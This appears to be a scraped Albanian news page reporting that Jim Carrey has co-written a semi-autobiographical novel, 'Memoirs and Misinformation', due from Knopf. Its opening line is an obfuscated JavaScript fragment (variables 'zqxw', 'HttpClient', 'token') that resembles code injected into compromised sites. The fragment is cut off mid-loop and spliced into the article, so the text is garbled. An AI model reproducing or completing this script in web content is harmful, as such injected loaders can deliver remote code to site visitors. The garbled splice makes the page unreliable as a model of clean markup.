;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Komediani dhe aktori i njohur po sjell libër për herë të parë

By

Jim Carrey së fundmi ka vendosur të pushtojë edhe botën letrare.

Aktori ka shkruar një roman të quajtur “Memoirs and Misinformation”, njoftoi të mërkurën Alfred A. Knopf.

Jim Carrey

Së bashku me bashkautorin Dana Vachon, Carrey ka shkruar për personazh të famshëm, aktrim, romancë dhe disa tema të tjera me të cilat është i njohur.

Botuesi po e quan librin një “dekonstruksion i patrembur dhe gjysëm autobiografik i personalitetit”.

“Memoirs and Misinformation,” është planifikuar të botohet majin e ardhshëm. Carrey, si komedian i vërtetë kur u pyet se a ishin të vërteta ngjarjet e librit u shpreh se:

“Asnjë nga këto nuk është e vërtetë dhe e gjithë kjo është e vërtetë.”

Carrey, 57, është i njohur për filma të tillë si “Dumb and Dumber” dhe “Man on the Moon”. Ai nuk është aktori i parë në vitet e fundit që i drejtohet shkrimit.

Të tjerët përfshijnë Tom Hanks, Sean Penn dhe Ethan Hawke.

Burimi: Pagesix.com

Artikuj të ngjashëm